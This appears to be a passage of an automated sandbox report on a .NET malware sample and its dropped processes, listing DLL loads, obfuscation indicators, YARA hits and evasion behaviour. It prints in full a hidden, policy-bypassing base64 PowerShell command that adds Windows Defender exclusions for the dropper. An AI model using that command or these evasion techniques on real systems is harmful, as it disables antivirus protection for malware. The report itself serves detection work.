                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeSection loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeSection loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeSection loaded: dnsapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeSection loaded: winnsi.dll
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeSection loaded: rasapi32.dll
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeSection loaded: rasman.dll
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeSection loaded: rtutils.dll
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeSection loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeSection loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeSection loaded: rasadhlp.dll
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeSection loaded: fwpuclnt.dll
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeSection loaded: secur32.dll
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeSection loaded: schannel.dll
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeSection loaded: mskeyprotect.dll
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeSection loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeSection loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeSection loaded: ncryptsslp.dll
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeSection loaded: amsi.dll
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeSection loaded: wininet.dll
                    Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                    Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: file.exe, 00000000.00000002.1786708622.0000000006F80000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.1767868411.000000000478C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1767868411.000000000459C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1763526633.0000000003646000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1841950156.00000000032A9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3019858995.0000000004922000.00000004.00000800.00020000.00000000.sdmp, txxbiwtbs.exe, 0000000B.00000002.2048354854.0000000003F2D000.00000004.00000800.00020000.00000000.sdmp, txxbiwtbs.exe, 0000000B.00000002.1995844689.0000000002A00000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: file.exe, 00000000.00000002.1786708622.0000000006F80000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.1767868411.000000000478C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1767868411.000000000459C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1763526633.0000000003646000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1841950156.00000000032A9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3019858995.0000000004922000.00000004.00000800.00020000.00000000.sdmp, txxbiwtbs.exe, 0000000B.00000002.2048354854.0000000003F2D000.00000004.00000800.00020000.00000000.sdmp, txxbiwtbs.exe, 0000000B.00000002.1995844689.0000000002A00000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdbSHA256}Lq source: file.exe, 00000000.00000002.1790879005.00000000083C0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1767868411.000000000459C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1785706737.0000000006E10000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.1824447213.0000000009EB1000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1869188121.00000000047F2000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1869188121.0000000004C76000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3095261684.00000000076D6000.00000004.00000800.00020000.00000000.sdmp, txxbiwtbs.exe, 0000000B.00000002.2048354854.0000000003F2D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdb source: file.exe, 00000000.00000002.1790879005.00000000083C0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1767868411.000000000459C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1785706737.0000000006E10000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.1824447213.0000000009EB1000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1869188121.00000000047F2000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1869188121.0000000004C76000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3095261684.00000000076D6000.00000004.00000800.00020000.00000000.sdmp, txxbiwtbs.exe, 0000000B.00000002.2048354854.0000000003F2D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: Fbedztzxbbe.pdb source: file.exe, 00000000.00000002.1767868411.000000000459C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1767868411.0000000004378000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1869188121.00000000047F2000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1869188121.0000000004C76000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3019858995.0000000004AB7000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3019858995.0000000004922000.00000004.00000800.00020000.00000000.sdmp

                    Data Obfuscation

                    Source: 0.2.file.exe.459c2e8.6.raw.unpack, OVAC5LcmtgojpkhnNKb.cs.Net Code: Type.GetTypeFromHandle(Khmx1Yt6SBxTndHcLiS.yA0DXaCBy7(16777370)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(Khmx1Yt6SBxTndHcLiS.yA0DXaCBy7(16777248)),Type.GetTypeFromHandle(Khmx1Yt6SBxTndHcLiS.yA0DXaCBy7(16777334))})
                    Source: file.exe, -.cs.Net Code: _0001 System.Reflection.Assembly.Load(byte[])
                    Source: TypeId.exe.0.dr, -.cs.Net Code: _0001 System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.file.exe.84e6078.17.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                    Source: 0.2.file.exe.84e6078.17.raw.unpack, ListDecorator.cs.Net Code: Read
                    Source: 0.2.file.exe.84e6078.17.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                    Source: 0.2.file.exe.84e6078.17.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                    Source: 0.2.file.exe.84e6078.17.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                    Source: 0.2.file.exe.6f80000.15.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                    Source: 0.2.file.exe.6f80000.15.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                    Source: 0.2.file.exe.6f80000.15.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                    Source: 0.2.file.exe.6e10000.14.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                    Source: 0.2.file.exe.6e10000.14.raw.unpack, ListDecorator.cs.Net Code: Read
                    Source: 0.2.file.exe.6e10000.14.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                    Source: 0.2.file.exe.6e10000.14.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                    Source: 0.2.file.exe.6e10000.14.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                    Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwALABDADoAXABVAHMAZQByAHMAXABqAG8AbgBlAHMAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAVAB5AHAAZQBJAGQALgBlAHgAZQA7AA==
                    Source: Yara matchFile source: 0.2.file.exe.459c2e8.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.file.exe.81dfff8.19.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.file.exe.8167fb8.22.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.InstallUtil.exe.4a62b70.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.file.exe.81dfff8.19.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.TypeId.exe.4da8708.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.file.exe.467db08.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.file.exe.818ffd8.18.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.file.exe.459c2e8.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.file.exe.8167fb8.22.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.file.exe.6d60000.13.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.file.exe.94c0000.24.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.InstallUtil.exe.7596838.10.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.file.exe.818ffd8.18.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.txxbiwtbs.exe.7c40000.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.TypeId.exe.4c760c8.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.1790879005.00000000083C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.2976520133.000000000309D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1763526633.00000000033C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.1995844689.00000000029BF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.3095261684.0000000007491000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.2219301967.0000000007C40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.2976520133.0000000003200000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1784663616.0000000006D60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.3019858995.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1818030083.00000000094C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.1995844689.000000000289B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1767868411.000000000459C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.1869188121.0000000004C76000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1763526633.0000000003526000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.1841950156.00000000032A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1790879005.0000000007CB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: file.exe PID: 7600, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: TypeId.exe PID: 7764, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 8028, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: txxbiwtbs.exe PID: 3624, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06100448 push es; retf
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06104D2D push es; iretd
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06100DE0 push es; retf
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06100DE3 push es; retf
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06E0459A push ebp; iretd
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06E03106 push esp; iretd
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_071029E9 push eax; retf
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_09E55BE0 push ebp; iretd
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_09E55FB2 push ecx; iretd
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_09E57361 push edx; iretd
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B99D2A5 pushad ; iretd
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9BB82316 push 8B485F93h; iretd
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeCode function: 3_2_06D55202 push esp; retf
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeCode function: 3_2_06D65C8F push es; retf
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeCode function: 3_2_06D604A1 push es; retf
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeCode function: 3_2_075FB705 push FFFFFF8Bh; iretd
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeCode function: 3_2_075FB475 push FFFFFF8Bh; iretd
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeCode function: 3_2_07A7459A push ebp; iretd
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeCode function: 3_2_07A73106 push esp; iretd
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeCode function: 3_2_07C739A8 push eax; retf 07B2h
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeCode function: 3_2_07C73300 pushfd ; ret
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_08ADF3E6 push 0B58158Dh; ret
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_08ADE79B push cs; ret
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0A3B6E01 push 8B04568Bh; retf
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0A3B6FBD push 8B0476FFh; retf
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0A3B6D74 push 8B04568Bh; retf
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0A9A2F91 push cs; ret
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0A9A2F11 push cs; ret
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0A9A103F push cs; ret
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0A9A2836 push cs; ret
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0A9A29E9 push eax; retf
                    Source: 0.2.file.exe.459c2e8.6.raw.unpack, OVAC5LcmtgojpkhnNKb.csHigh entropy of concatenated method names: 'I9M4QO4qB2a0IXiJetI', 'b6wj1A4aYmFuI0OhGoj', 'Iq5ou9bf1s', 'aAjRmY46l9nRDybJZAs', 'hF7CKc4JBtaJDC4fcIW', 'IIudEc4UKfLbr0oA3uh', 'yKnaIq4b7l4t2has25F', 'CGgZxt4mLE0QvjZde3S', 'kDQRMv4ORicQjvOUf1h', 'VdinR24lwqPMsw03Gur'
                    Source: 0.2.file.exe.459c2e8.6.raw.unpack, AssemblyLoader.csHigh entropy of concatenated method names: 'CultureToString', 'ReadExistingAssembly', 'CopyTo', 'LoadStream', 'LoadStream', 'ReadStream', 'ReadFromEmbeddedResources', 'ResolveAssembly', 'Attach', 'Wu1953XvgCs8K9qZkQt'
                    Source: 0.2.file.exe.459c2e8.6.raw.unpack, Wqs5URts4KOjaidB9QJ.csHigh entropy of concatenated method names: 'YBNaqvLQSi', 'pvCaaUlNbv', 'VkoaBc4DHI', 'WUKawN2oxw', 'J85a9UGWOg', 'heEa6lZuUB', 'paNaJeg9e4', 'eeyiRIndE8', 'WHkaUGJDqh', 'tw4abJLijJ'
                    Source: 0.2.file.exe.459c2e8.6.raw.unpack, gWwFh6uutZrgsqwKKY.csHigh entropy of concatenated method names: 'TBIgfxPCab', 'TJ1ggw33WF', 'e6fgrHXbEm', 'hu3gYoFsZN', 'fNPgTxIx2Q', 'CdRgCV1Li1', 'IILgpN3iiP', 'RAmgcXnOiK', 'Bd7goHmTqU', 'LRWgtVbJQT'
                    Source: 0.2.file.exe.459c2e8.6.raw.unpack, Wbs8nJYojjAvBw9Hhml.csHigh entropy of concatenated method names: 'D1EYiO6J8K', 'xwTYRgTVux', 'vJlY0SGosW', 'zq2Yxyrt08', 'aP0IboXq4hTeF0gQ9wJ', 'dVxZKYXa6LclnuJ5ee6', 'pQ9JfpXBPiH7T4Vcrta'
                    Source: 0.2.file.exe.459c2e8.6.raw.unpack, J6tGnyHiUI5UPRSjfZ.csHigh entropy of concatenated method names: 'U70jBSXn5', 'dMqLWJfnG', 'IrkEltLsS', 'Fr978ENva', 'To5PjKBDa', 'ITtn1AeTu', 'vJgMmdatA', 'US5AQ3bYV', 'T6m0dnkB6kSpsMRXfpN', 'lQsld7kw4Lynf8VnZrJ'
                    Source: 0.2.file.exe.459c2e8.6.raw.unpack, Khmx1Yt6SBxTndHcLiS.csHigh entropy of concatenated method names: 'yA0DXaCBy7', 'PLKD8ijtF0', 'rK8Nbk4VQ8s3xgVtxaM', 'uhkw3u4DDAijN7TSpEl', 'bZsmiM4SaUIiCG2pVVO', 'Jf4qWj4slcbkra3Lago', 'BV8jOd4vtlorEUV1k4C', 'ceUqK84HTAtTTIEGh89'
                    Source: 0.2.file.exe.459c2e8.6.raw.unpack, qHLtQPrzIOZ8bY0fBih.csHigh entropy of concatenated method names: 'sayYgnSNDo', 'yw9YryL69X', 'OYPYYS8uP8', 'dCgYTJMxJc', 'tarYCPE8Af', 'iXGYp6FjBE', 'JQqf0cXfrZlBlmrY9Ly', 'vyxcZ7XgJHoWaIVFIRE', 'tM0wuAXrTnrcQ6M49E3', 'JpoKKlXY78EwjY9LQAg'
                    Source: 0.2.file.exe.459c2e8.6.raw.unpack, EgOZ8Bh7IS3c7wI5eg.csHigh entropy of concatenated method names: 'zofQGtWwY', 'SXb5B6n9S', 'q7feUEnuH', 'lIMZYRRiF', 'X7gKuDU4u', 'MvQ1Qs4Zp', 'sZuywDECs', 'A0Md2IxGc', 'i7rkK8RKD', 'rQnXW5MIl'
                    Source: 0.2.file.exe.459c2e8.6.raw.unpack, bkFcHwrdJkSsEUL23AN.csHigh entropy of concatenated method names: 'IFIrSDbbfZ', 'nkSrsQu8BQ', 'WSUrXoqqL2', 'kKQr8IubBs', 'XAwr4AQGkp', 'zYsrNIbDl4', 'UDmryF56xR', 'KA5rGsPscL', 'lwArVbRcYJ', 'xQKrD1Cov0'
                    Source: 0.2.file.exe.459c2e8.6.raw.unpack, osNFZZtOwYpFwvRLpuE.csHigh entropy of concatenated method names: 'KB1tkQBP5t', 'G10tXsrmIG', 'cxyt85MoHy', 'JOot4HCWPf', 'oTOtNGNTer', 'jf3tyldlb6', 'P6gtGjc00v', 'n5ktVm1yqV', 'JdstDuUIVQ', 'VAVtSjaiid'
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File created: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe

                    Hooking and other Techniques for Hiding and Protection

                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Process information set: NOOPENFILEERRORBOX  (97 identical entries)
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe  Process information set: NOOPENFILEERRORBOX  (73 identical entries)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe  Process information set: NOOPENFILEERRORBOX  (89 identical entries)
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    Source: Yara matchFile source: Process Memory Space: file.exe PID: 7600, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: TypeId.exe PID: 7764, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 8028, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: txxbiwtbs.exe PID: 3624, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                    Source: powershell.exe, 00000001.00000002.1923913361.00000182B8533000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1923913361.00000182B84FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1923913361.00000182B84C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1908721371.0000021117C28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1908721371.00000211179B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1908721371.0000021117C54000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: + ... S\APPDATA\LOCAL\TEMP\; ADD-MPPREFERENCE -EXCLUSIONPROCESS TYPEID.EXE;
                    Source: TypeId.exe, 00000003.00000002.1838711068.0000000001650000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\TEMP\ASLLOG_DETECTORSTRACE_TYPEID.EXE_7764.TXT
                    Source: powershell.exe, 00000001.00000002.1923913361.00000182B80BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1908721371.000002111782E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: TYPEID.EXE;
                    Source: powershell.exe, 00000001.00000002.1923913361.00000182B84FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1923913361.00000182B84C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1908721371.00000211179B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: JOB COMMAND = ADD-MPPREFERENCE -EXCLUSIONPROCESS TYPEID.EXE;
                    Source: TypeId.exe, 00000003.00000002.1837907312.0000000001480000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\SYSTEM32\C:\USERS\user\APPDATA\LOCAL\REGISTEREDCHANNELS\HWRTALNMJ\TYPEID.EXEC:\USERS\user\APPDATA\LOCAL\REGISTEREDCHANNELS\HWRTALNMJ\TYPEID.EXEC:\USERS\user\APPDATA\LOCAL\REGISTEREDCHANNELS\HWRTALNMJ\TYPEID.EXEWINSTA0\DEFAULT
                    Source: file.exe, 00000000.00000002.1783142050.00000000069E8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1789825347.000000000778E000.00000004.00000020.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1841950156.0000000003689000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1835768754.00000000012F7000.00000004.00000010.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1838711068.000000000165E000.00000004.00000020.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1838711068.0000000001650000.00000004.00000020.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1838711068.00000000016DB000.00000004.00000020.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1841950156.00000000034A4000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1838711068.0000000001684000.00000004.00000020.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1837654824.0000000001460000.00000004.00000020.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1838711068.0000000001696000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 